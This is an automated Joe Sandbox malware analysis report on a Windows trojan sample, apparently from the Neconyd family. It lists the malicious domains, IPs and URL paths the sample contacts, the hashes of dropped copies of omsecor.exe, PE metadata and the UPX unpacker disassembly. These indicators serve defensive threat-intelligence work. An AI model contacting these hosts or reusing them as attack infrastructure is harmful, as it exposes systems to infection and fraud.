          NameIPActiveMaliciousAntivirus DetectionReputation
          lousta.net
          193.166.255.171
          truetrue
            unknown
            mkkuei4kdsz.com
            64.225.91.73
            truetrue
              unknown
              ow5dirasuek.com
              52.34.198.229
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://mkkuei4kdsz.com/true
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/161/343.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/100/325.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/895/196.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/601/938.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/976/76.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/303/619.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/130/71.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/true
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/59/409.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/347/423.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/467/386.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/179/569.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/true
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/88/221.htmltrue
                • Avira URL Cloud: phishing
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://nojs.domaincntrol.comomsecor.exe, 00000001.00000002.1986796301.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879755700.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://mkkuei4kdsz.com/130/71.htmlcrosoftomsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/179/569.htmlQZomsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/100/325.html)Lomsecor.exe, 00000001.00000002.1987110192.0000000000628000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/179/569.html;omsecor.exe, 00000001.00000002.1986796301.0000000000194000.00000004.00000010.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/161/343.htmllomsecor.exe, 00000008.00000002.2986475132.00000000005E1000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/895/196.html#omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/yomsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/179/569.html3omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.htmlpomsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/130/71.htmlr&&omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                https://domaincntrol.com/?orighost=omsecor.exe, 00000001.00000002.1986796301.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879755700.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://lousta.net/347/423.htmlt?E&omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.htmlzomsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/179/569.htmleZomsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/179/569.htmliZ#omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.htmlP&omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.html$omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.html(omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/303/619.html=omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.html&omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/467/386.htmlQ=omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/161/343.html=omsecor.exe, 00000008.00000002.2986475132.00000000005E1000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/59/409.htmlk7omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/179/569.htmliomsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/976/76.htmlmswsock.dll.muiomsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/347/423.html(omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/88/221.htmlVomsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/179/569.htmlGUomsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/&Xomsecor.exe, 00000008.00000002.2986475132.000000000059E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/895/196.html_omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/161/343.htmleomsecor.exe, 00000008.00000002.2986475132.00000000005E1000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/303/619.htmlEcomsecor.exe, 00000001.00000002.1987110192.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/100/325.html7omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodconcnzWgjUhS2.exe, 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, omsecor.exe, 00000001.00000002.1986846567.0000000000401000.00000040.00000001.01000000.00000004.sdmp, omsecor.exe, 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, omsecor.exe, 00000008.00000002.2986278876.0000000000401000.00000040.00000001.01000000.00000007.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.html;omsecor.exe, 00000005.00000002.2879755700.0000000000194000.00000004.00000010.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/179/569.htmloZomsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/59/409.html(&Z&omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/601/938.htmlshqos.dll.muiomsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/161/343.htmlTomsecor.exe, 00000008.00000002.2986475132.000000000059A000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/en-GBomsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.htmlasuek.com5omsecor.exe, 00000005.00000002.2879968541.000000000062E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.htmlNomsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                64.225.91.73
                mkkuei4kdsz.comUnited States
                14061DIGITALOCEAN-ASNUStrue
                193.166.255.171
                lousta.netFinland
                1741FUNETASFItrue
                52.34.198.229
                ow5dirasuek.comUnited States
                16509AMAZON-02UStrue
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1506967
                Start date and time:2024-09-08 06:08:39 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 36s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:9
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:cnzWgjUhS2.exe
                renamed because original name is a hash value
                Original Sample Name:Trojan.Danger.ATA_virussign.com_10b089f41384787f77a9de73a9c55e4b.exe
                Detection:MAL
                Classification:mal100.bank.troj.evad.winEXE@7/3@3/3
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 97%
                • Number of executed functions: 23
                • Number of non-executed functions: 111
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: cnzWgjUhS2.exe
                TimeTypeDescription
                00:09:37API Interceptor12x Sleep call for process: omsecor.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                64.225.91.73Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                • mkkuei4kdsz.com/67/735.html
                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                • mkkuei4kdsz.com/767/569.html
                uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                • qetyhyg.com/login.php
                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                • mkkuei4kdsz.com/210/474.html
                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                • mkkuei4kdsz.com/238/776.html
                djvu452.exeGet hashmaliciousNeconydBrowse
                • mkkuei4kdsz.com/350/859.html
                gdvfd35.exeGet hashmaliciousNeconydBrowse
                • mkkuei4kdsz.com/982/120.html
                v48ge.exeGet hashmaliciousNeconydBrowse
                • mkkuei4kdsz.com/87/595.html
                moviename.exeGet hashmaliciousNeconydBrowse
                • mkkuei4kdsz.com/478/570.html
                voltage.exeGet hashmaliciousNeconydBrowse
                • mkkuei4kdsz.com/553/840.html
                193.166.255.171Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                • lousta.net/372/625.html
                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                • lousta.net/766/881.html
                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                • lousta.net/240/311.html
                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                • lousta.net/461/572.html
                djvu452.exeGet hashmaliciousNeconydBrowse
                • lousta.net/775/668.html
                v48ge.exeGet hashmaliciousNeconydBrowse
                • lousta.net/803/179.html
                moviename.exeGet hashmaliciousNeconydBrowse
                • lousta.net/559/617.html
                voltage.exeGet hashmaliciousNeconydBrowse
                • lousta.net/4/805.html
                btr.exeGet hashmaliciousNeconydBrowse
                • lousta.net/935/40.html
                P81JnbTtck.exeGet hashmaliciousNeconydBrowse
                • lousta.net/113/923.html
                52.34.198.229Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                • ow5dirasuek.com/944/938.html
                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                • ow5dirasuek.com/643/773.html
                RfdNuhaVvG.exeGet hashmaliciousSakula RATBrowse
                • www.savmpet.com/photo/bcyybe-1288432018.jpg?resid=5281296
                uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                • lygyvuj.com/login.php
                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                • ow5dirasuek.com/342/85.html
                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                • ow5dirasuek.com/115/979.html
                djvu452.exeGet hashmaliciousNeconydBrowse
                • ow5dirasuek.com/534/373.html
                gdvfd35.exeGet hashmaliciousNeconydBrowse
                • ow5dirasuek.com/307/439.html
                v48ge.exeGet hashmaliciousNeconydBrowse
                • ow5dirasuek.com/413/412.html
                moviename.exeGet hashmaliciousNeconydBrowse
                • ow5dirasuek.com/815/970.html
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                ow5dirasuek.comZ0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                djvu452.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                gdvfd35.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                v48ge.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                moviename.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                voltage.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                btr.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                lousta.netZ0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                djvu452.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                v48ge.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                moviename.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                voltage.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                btr.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                P81JnbTtck.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                mkkuei4kdsz.comZ0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                djvu452.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                gdvfd35.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                v48ge.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                moviename.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                voltage.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                btr.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                FUNETASFIZ0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                m68k.elfGet hashmaliciousMirai, MoobotBrowse
                • 157.24.67.224
                i686.elfGet hashmaliciousUnknownBrowse
                • 157.24.20.211
                djvu452.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                • 157.24.67.223
                v48ge.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                SecuriteInfo.com.Linux.Siggen.9999.28377.24731.elfGet hashmaliciousMiraiBrowse
                • 192.98.92.242
                DIGITALOCEAN-ASNUSZ0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                SecuriteInfo.com.ELF.Mirai-ARL.4787.647.elfGet hashmaliciousMiraiBrowse
                • 178.128.160.165
                https://cl.gy/BnDLjGet hashmaliciousUnknownBrowse
                • 188.166.17.21
                uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                • 64.225.91.73
                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                https://vigilantesecurity.ca/index.shtmlGet hashmaliciousUnknownBrowse
                • 159.65.211.77
                https://domainsecurityreports.ca/index.shtmlGet hashmaliciousUnknownBrowse
                • 159.65.211.77
                https://domainsecurityreports.ca/index.shtmlGet hashmaliciousUnknownBrowse
                • 159.65.211.77
                AMAZON-02USZ0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                SecuriteInfo.com.Adware.DownwareNET.4.3128.32406.exeGet hashmaliciousUnknownBrowse
                • 18.239.38.162
                SecuriteInfo.com.Adware.DownwareNET.4.3128.32406.exeGet hashmaliciousUnknownBrowse
                • 18.239.38.166
                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                https://amazon-104169.weeblysite.com/Get hashmaliciousUnknownBrowse
                • 54.201.194.161
                https://amazon-103674.weeblysite.com/Get hashmaliciousUnknownBrowse
                • 54.201.194.161
                https://amazon-103974.weeblysite.com/Get hashmaliciousUnknownBrowse
                • 54.69.50.186
                https://conecctwvallete.gitbook.io/Get hashmaliciousUnknownBrowse
                • 18.239.36.120
                https://amazon-103093.weeblysite.com/Get hashmaliciousUnknownBrowse
                • 54.201.194.161
                https://conecctwvallete.gitbook.io/usGet hashmaliciousUnknownBrowse
                • 108.138.7.90
                No context
                No context
                Process:C:\Users\user\Desktop\cnzWgjUhS2.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                Category:dropped
                Size (bytes):36600
                Entropy (8bit):7.811358055923133
                Encrypted:false
                SSDEEP:768:U6vjVmakOElpmAsUA7DJHrhto2OsgwAPTUrpiEe7HpB:j8Z0kA7FHlO2OwOTUtKjpB
                MD5:BA4DF80E161C9C58860725AAC02D99E4
                SHA1:CC5247AFD1FAA023B04FA163769FCED8A4FACC67
                SHA-256:6F0DB674782A337AAC17C77772BC71E2C1D992E87EBB6174A7732F2A28F7BB2D
                SHA-512:6B02356AB380850E358B3A22DEAA9B2F842EFE426236CB4BBBAB50CD05151B46C79889618B8E00B8019678890B0A5C694C92B7A017C370644A93AF007CD6CD86
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m.m.m.m...m.m.m...mRich...m................PE..L.....P......................... ..`....0........@.....................................................................................................................................................H...........................................UPX0..... ..............................UPX1.........0......................@...UPX2................................@..............................................................................................................................................................................................................................................................................................................................................................................................................4.22.UPX!....
                Process:C:\Windows\SysWOW64\omsecor.exe
                File Type:data
                Category:dropped
                Size (bytes):100
                Entropy (8bit):1.8626376367274078
                Encrypted:false
                SSDEEP:3:gtqyuCbFtdkdmdf8fd9:gwDvdmdf83
                MD5:B45EBCFDAB51CE8D00E87D3018E77ADC
                SHA1:0C57AF7B6BF68E96EE0FD9B20A29280BB3E0C81F
                SHA-256:9B94ED408D47A530A9B337933258C2B872C94734919BF03732DF4D809D3DD2B1
                SHA-512:98882CDEFD148443EDA5FABC7B88EAB941FB0D16D5BCE74DEEC105B381EC16A1A65709449AB186D40C408914B704CC61EB4C3A2998B672B19F420A9B89109046
                Malicious:false
                Reputation:low
                Preview:-x.x.x.x.x.x6x.x.xxxIxKxKxOxHxJxLxJxJxHxHxAxOxMxIxOxOxIxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
                Process:C:\Users\user\AppData\Roaming\omsecor.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                Category:dropped
                Size (bytes):36600
                Entropy (8bit):7.811365297306151
                Encrypted:false
                SSDEEP:768:W6vjVmakOElpmAsUA7DJHrhto2OsgwAPTUrpiEe7HpB:t8Z0kA7FHlO2OwOTUtKjpB
                MD5:9AF480E9873460DD811C495A948A78AE
                SHA1:52F194026A2EC41FCA1738E6911EEA5298712635
                SHA-256:CC43372B26504DB80D8A12CF0F906672972F0D3DC9B3959351D31DCA562231B5
                SHA-512:B05662E32B6075188278B21388F98C1661ECBD19012E363984F5B92B01E0F32B983C0E30E1A8CA74D14039913C99F0615BCBA51F8F71E9E2A8DCDEAA3A1ABF59
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m.m.m.m...m.m.m...mRich...m................PE..L...~.P......................... ..`....0........@.....................................................................................................................................................H...........................................UPX0..... ..............................UPX1.........0......................@...UPX2................................@..............................................................................................................................................................................................................................................................................................................................................................................................................4.22.UPX!....
                File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                Entropy (8bit):7.811340093455825
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.66%
                • UPX compressed Win32 Executable (30571/9) 0.30%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:cnzWgjUhS2.exe
                File size:36'600 bytes
                MD5:10b089f41384787f77a9de73a9c55e4b
                SHA1:b5cd02bedf0c963c95b17937f334b4eb950a22ed
                SHA256:ce28f0ea14877935233268bb240e0aa2013eb133a179fee671144939539fdc7a
                SHA512:22767b0b9a9ca2bddc6fbcb06f1d50293a425cb7cb701b797b4612824928dbf85ee808d9fdccd7ab489dd87c3693c310f917b8565d21c0b8067cfb32a233b9cd
                SSDEEP:768:k6vjVmakOElpmAsUA7DJHrhto2OsgwAPTUrpiEe7HpB:z8Z0kA7FHlO2OwOTUtKjpB
                TLSH:95F2F19F18015ECACB95593027A29B0D2F6E7D905B1DB3C21A9E307C74D35EAF670B08
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m...m.m.m...m.m.m...mRich...m................PE..L......P...................
                Icon Hash:90cececece8e8eb0
                Entrypoint:0x42b560
                Entrypoint Section:UPX1
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:
                Time Stamp:0x50B2D8C7 [Mon Nov 26 02:49:43 2012 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:ca90886d8faeb004fd43054d3e6673d8
                Instruction
                pushad
                mov esi, 00423000h
                lea edi, dword ptr [esi-00022000h]
                push edi
                jmp 00007FEF38EDD95Dh
                nop
                mov al, byte ptr [esi]
                inc esi
                mov byte ptr [edi], al
                inc edi
                add ebx, ebx
                jne 00007FEF38EDD959h
                mov ebx, dword ptr [esi]
                sub esi, FFFFFFFCh
                adc ebx, ebx
                jc 00007FEF38EDD93Fh
                mov eax, 00000001h
                add ebx, ebx
                jne 00007FEF38EDD959h
                mov ebx, dword ptr [esi]
                sub esi, FFFFFFFCh
                adc ebx, ebx
                adc eax, eax
                add ebx, ebx
                jnc 00007FEF38EDD941h
                jne 00007FEF38EDD95Bh
                mov ebx, dword ptr [esi]
                sub esi, FFFFFFFCh
                adc ebx, ebx
                jnc 00007FEF38EDD936h
                xor ecx, ecx
                sub eax, 03h
                jc 00007FEF38EDD95Fh
                shl eax, 08h
                mov al, byte ptr [esi]
                inc esi
                xor eax, FFFFFFFFh
                je 00007FEF38EDD9C6h
                mov ebp, eax
                add ebx, ebx
                jne 00007FEF38EDD959h
                mov ebx, dword ptr [esi]
                sub esi, FFFFFFFCh
                adc ebx, ebx
                adc ecx, ecx
                add ebx, ebx
                jne 00007FEF38EDD959h
                mov ebx, dword ptr [esi]
                sub esi, FFFFFFFCh
                adc ebx, ebx
                adc ecx, ecx
                jne 00007FEF38EDD972h
                inc ecx
                add ebx, ebx
                jne 00007FEF38EDD959h
                mov ebx, dword ptr [esi]
                sub esi, FFFFFFFCh
                adc ebx, ebx
                adc ecx, ecx
                add ebx, ebx
                jnc 00007FEF38EDD941h
                jne 00007FEF38EDD95Bh
                mov ebx, dword ptr [esi]
                sub esi, FFFFFFFCh
                adc ebx, ebx
                jnc 00007FEF38EDD936h
                add ecx, 02h
                cmp ebp, FFFFF300h
                adc ecx, 01h
                lea edx, dword ptr [edi+ebp]
                cmp ebp, FFFFFFFCh
                jbe 00007FEF38EDD961h
                mov al, byte ptr [edx]
                inc edx
                mov byte ptr [edi], al
                inc edi
                dec ecx
                jne 00007FEF38EDD949h
                jmp 00007FEF38EDD8B8h
                nop
                mov eax, dword ptr [edx]
                add edx, 04h
                mov dword ptr [edi], eax
                add edi, 04h
                sub ecx, 04h
                jnbe 00007FEF38EDD943h
                add edi, ecx
                jmp 00007FEF38EED8A1h
                Programming Language:
                • [ASM] VS2005 build 50727
                • [ C ] VS2005 build 50727
                • [LNK] VS2005 build 50727
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x2c0000x1f0UPX2
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2b6c00x48UPX1
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
